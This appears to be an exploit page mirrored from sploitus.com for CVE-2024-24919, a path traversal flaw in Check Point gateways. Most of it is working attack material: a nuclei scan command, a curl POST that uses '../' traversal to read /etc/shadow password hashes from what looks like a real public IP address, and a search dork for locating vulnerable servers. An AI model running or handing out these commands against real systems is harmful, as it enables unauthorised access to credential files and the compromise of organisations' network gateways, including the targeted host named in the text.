Share
## https://sploitus.com/exploit?id=61732142-E6D2-5AD9-B6B7-AEABD1371FFD
<h1>Check point:CVE-2024-24919</h1>

![2024-05-31_08-14](https://github.com/0x3f3c/CVE-2024-24919/assets/154844497/ca4abf7a-0cc1-4f51-95de-949f67e156ad)


<h1> run CVE </h1>

```
nuclei -list chick.txt -t CVE-2024-24919.yaml
```


<h>Replace <ip> with the target IP address, and this command will attempt to access the /etc/shadow file, which contains password hashes.</h>


```
curl --path-as-is -i -s -k -X POST \ -H 'Host: 117.102.198.7 ' \ -H 'Content-Length: 39' \ -H 'Connection: keep-alive' \ --data-binary 'aCSHELL/../../../../../../../etc/shadow' \ 'https://117.102.198.7/clients/MyCRL'
```

![cve](https://github.com/0x3f3c/CVE-2024-24919/assets/154844497/ed7a46c4-3e67-498f-906f-28711391a163)


<h1>Dork: "Server: Check Point SVN" "X-UA-Compatible: IE=EmulateIE7"</h1>